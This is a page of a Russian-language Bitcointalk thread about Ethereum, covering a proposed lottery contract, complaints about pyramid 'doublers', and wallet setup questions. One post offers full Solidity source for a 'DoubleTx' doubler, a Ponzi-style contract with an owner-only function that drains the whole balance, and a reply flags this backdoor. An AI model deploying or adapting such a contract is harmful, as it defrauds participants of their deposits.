Author

Topic: [ETH] Ethereum - мировой компьютер - page 1363. (Read 1885832 times)

hero member
Activity: 619
Merit: 500
Не, пятидневная или семи дневная лотерея это классный вариант. Я согласен, тут курс летает за 5-7 дней на +-20-30%.. а ты тут жди 30 дней. Не тема. И еще бы в лотерее предусмотреть выигрыш на двоих или троих. Как 1,2 и 3 места, но выигрыш поровну.... Вспомнил новости из США, где выиграли баснословные бабосы в лотерею на троих.. около миллиарда баксов что ли. Теперь им выплачивать будут до 2050 года (примерно) или больше что ли.. а если сразу сумму какую то, то выигрыш всего 337 млн или около. Но всё равное, неплохо так.

а к 2050 или ишак сдохнет или шах, везде кидалово
hero member
Activity: 882
Merit: 502
Есть идея сделать эфириум лотерею.
Например, каждый посылает 1-2 эфириума на адрес контракта. Раз в месяц случайно выбирается победитель и ему уходит вся сумма.
Как вам идея?

Нормальная! Больше смарт контрактов няшних и разных!
Согласен, думаю будет востоебовано,  только нужно все продумать, потом ведь изменеия в контракт уже не внесешь...
hero member
Activity: 616
Merit: 500
Не, пятидневная или семи дневная лотерея это классный вариант. Я согласен, тут курс летает за 5-7 дней на +-20-30%.. а ты тут жди 30 дней. Не тема. И еще бы в лотерее предусмотреть выигрыш на двоих или троих. Как 1,2 и 3 места, но выигрыш поровну.... Вспомнил новости из США, где выиграли баснословные бабосы в лотерею на троих.. около миллиарда баксов что ли. Теперь им выплачивать будут до 2050 года (примерно) или больше что ли.. а если сразу сумму какую то, то выигрыш всего 337 млн или около. Но всё равное, неплохо так.
hero member
Activity: 826
Merit: 501
Например, каждый посылает 1-2 эфириума на адрес контракта. Раз в месяц случайно выбирается победитель и ему уходит вся сумма.
Как вам идея?
ОЧЕНЬ ХОРОШИЙ СМАРТ-КОНТРАКТ! (для некоторых - название темы посмотрите Wink) Только раз месяц я думаю это очень долго. Я думаю надо раз в неделю или ещё чаще (раз в 3 дня). Если будет раз в месяц, то будет всего 12 победителей например на 1000 вложивших, а если раз в неделю то 53 победителя. И эти победители будет пиарить лотерею дальше. Я думаю если будет раз в месяц, то у людей будет теряться интерес к лотерее. Да и вообще вот если будет раз в месяц то я например вложу 5-10 раз по 1 ETH и все буду ждать. А если будет раз в 3 дня, то скорее всего что бы повысить свои шансы я так же кину 5 раз по 1 ETH и так каждый 3 дня. Так что я думаю что у более короткой лотереи призовой фонд не сильно меньше будет! А вообще можно сделать 2 лотереи кому как нравится на 1 день (вообще будет ОГОНЬ) и 1 неделю. И я думаю что на 1 день даже быстрее будет набираться призовой фонд!!! Соответственно будет 365 победителей в год и я думаю создатель с более коротких лотерей получит явно больше комсы.
Ты не учёл, что это лотерея и выиграешь ты может быть на 50-ый раз когда уже на 50 эфиров вложишься, а может надоест уже на 25-ый раз участвовать.
full member
Activity: 150
Merit: 100
Как вам идея?
ОЧЕНЬ ХОРОШИЙ СМАРТ-КОНТРАКТ! (для некоторых - название темы посмотрите Wink) Только раз месяц я думаю это очень долго. Я думаю надо раз в неделю или ещё чаще (раз в 3 дня). Если будет раз в месяц, то будет всего 12 победителей например на 1000 вложивших, а если раз в неделю то 53 победителя. И эти победители будет пиарить лотерею дальше. Я думаю если будет раз в месяц, то у людей будет теряться интерес к лотерее. Да и вообще вот если будет раз в месяц то я например вложу 5-10 раз по 1 ETH и все буду ждать. А если будет раз в 3 дня, то скорее всего что бы повысить свои шансы я так же кину 5 раз по 1 ETH и так каждый 3 дня. Так что я думаю что у более короткой лотереи призовой фонд не сильно меньше будет! А вообще можно сделать 2 лотереи кому как нравится на 1 день (вообще будет ОГОНЬ) и 1 неделю. И я думаю что на 1 день даже быстрее будет набираться призовой фонд!!! Соответственно будет 365 победителей в год и я думаю создатель с более коротких лотерей получит явно больше комсы.
legendary
Activity: 1191
Merit: 1001
Как вам идея?

Хайпы дальше по коридору ---->

Лотерея это уже не хайп. Это игра.
при анонимности сети ,лотерея это тотже хайп.Как ты провериш подлиность настоящих транзакции,может там бот отправлять будет все и себе же выйгрыш делать ,так что хайп тотже......достали все эти темы про хайпы и лотереи
Надо головой думать прежде всего.
По поводу лотереи - самая темная часть, это какой рандомайзер будет использоваться для определения победителя...
legendary
Activity: 1050
Как вам идея?

при анонимности сети ,лотерея это тотже хайп.Как ты провериш подлиность настоящих транзакции,может там бот отправлять будет все и себе же выйгрыш делать ,так что хайп тотже......достали все эти темы про хайпы и лотереи
legendary
Activity: 1938
Merit: 1014
Люди, вы бы всеже открыли отдельную тему для обсуждения удвоителей.
Не всем это интересно тут.
Спасибо.

Поддерживаю.  Потрите уже флуд о пирамидах в этой теме

я думаю это не долгое явление (флуд о пирамидах), а так разбавление обстановки.имхо
legendary
Activity: 1974
Merit: 1160
Как вам идея?

legendary
Activity: 1358
Merit: 1013
Как вам идея?

legendary
Activity: 1974
Merit: 1160
Как вам идея?

Нормальная! Больше смарт контрактов няшних и разных!
member
Activity: 61
Merit: 10
Как вам идея?
sr. member
Activity: 298
Merit: 267
Отправил заявку, появиться как верифицируют

круто, скоро и второй защевелица  Cheesy
member
Activity: 61
Merit: 10
Отправил заявку, появиться как верифицируют
legendary
Activity: 1946
Merit: 1000
Если кто то хочет поиграться, или сделать свой, держите
contract DoubleTx{

struct Participant {
        address etherAddress;
        uint PayAmount;
    }

Participant[] public participants;

uint public payoutIdx = 0;
    uint public collectedFees = 0;
    uint public balance = 0;
   uint public timeout = now + 1 weeks;

address public owner;

// simple single-sig function modifier
    modifier onlyowner { if (msg.sender == owner) _ }

// this function is executed at initialization and sets the owner of the contract
    function DoubleTx() {
      collectedFees += msg.value;
        owner = msg.sender;
    }

// fallback function - simple transactions trigger this
    function() {
        enter();
    }

function enter() {
      //send more than 0.1 ether and less than 50, otherwise loss all
      if (msg.value >= 100 finney && msg.value <= 50 ether) {
           //update contract balance
           balance += msg.value;

// add a new participant to array and calculate need balance to payout
           uint idx = participants.length;
           participants.length += 1;
           participants[idx].etherAddress = msg.sender;
           participants[idx].PayAmount = 2 * msg.value;

uint NeedAmount = participants[payoutIdx].PayAmount;
         // if there are enough ether on the balance we can pay out to an earlier participant
          if (balance >= NeedAmount) {
               participants[payoutIdx].etherAddress.send(NeedAmount);

balance -= NeedAmount;
               payoutIdx += 1;
           }
      }
      else {
            return;
      }
    }

function NextPayout() {
        balance += msg.value;
      uint NeedAmount = participants[payoutIdx].PayAmount;

if (balance >= NeedAmount) {
            participants[payoutIdx].etherAddress.send(NeedAmount);

balance -= NeedAmount;
            payoutIdx += 1;
        }
    }

function collectFees() onlyowner {
        if (collectedFees == 0) return;

owner.send(collectedFees);
        collectedFees = 0;
    }

function collectBalance() onlyowner {
      balance += msg.value;
        if (balance == 0 && now > timeout) return;

owner.send(balance);
        balance = 0;
    }

function setOwner(address _owner) onlyowner {
        owner = _owner;
    }
}

Контракт с подвохом, админ может снять весь баланс.
Функция collectBalance() отправляет весь баланс кошелька на адресс создателя.
В моем такого нет!

Ти би добавил вторую пирамидку ту что 2% в дапси ато там кмсло совсем.
member
Activity: 139
Merit: 13
Эфир создан чтоб разводить людей на деньги Huh
Вы бы закруглялись, и написали что нибудь стоящее...

то, пле, гири совецкие по 100 мульёнов покупают то эфир из воздуха добывают.. вот оно сфетлое будущее))

"И не гОвОри кума, у сОмОй муж пьяница".
А намедни глЯжу на график фИрный, а там кой-то тОлстосУм Японскими свечами вагину любимой женщины фкладывает, фОт срАмота-то (прОсти х..госсподи).
И куда мир кОтится, ...у бОхатых сфои причуты.
legendary
Activity: 1246
Merit: 1000
то, пле, гири совецкие по 100 мульёнов покупают то эфир из воздуха добывают.. вот оно сфетлое будущее))
legendary
Activity: 1624
Merit: 1024
Эфир создан чтоб разводить людей на деньги Huh
Вы бы закруглялись, и написали что нибудь стоящее...
legendary
Activity: 1191
Кто разбирался с mist, может подскажет - в чем разница запускать mist как mist и mist как wallet?
Из гитхаба:
Switch the global.mode to "mist" in the main.js
и
Switch the global.mode to "wallet" in the main.js

hero member
Activity: 1542
Merit: 545

Народ, такой вопрос. Возможно ли как-то вытащить кошелек под 64 бита, на 32 битной винде?

Так поставь 64 битную винду. Делов-то на копейку  Smiley

Лень  Wink

Народ, такой вопрос. Возможно ли как-то вытащить кошелек под 64 бита, на 32 битной винде?

Есть файлы: Из Roaming папка Ethereum, так же Etherwall 0.9.1 (запускается), но он тогда работал вкупе с geth. Вот последнее требует 64 разряда.

В папке Ethereum есть папка keystore и в ней лежат ключи, каждый файл за каждый созданный акк отвечает. Эти файлы копируешь и все.

Я под 32 битную систему кошелька не нашел, кроме каких-то браузерных. В общем ясно, спасибо.
сейчас версия 0.4.0 64 бита,возможно эти работают,не проверял,32 бита
https://github.com/ethereum/mist/releases
https://github.com/ethereum/mist/releases/download/v0.3.8/Ethereum-Wallet-win32-0-3-8.zip
https://github.com/ethereum/mist/releases/download/0.3.6/Mist-win32-0-3-6.zip
Jump to: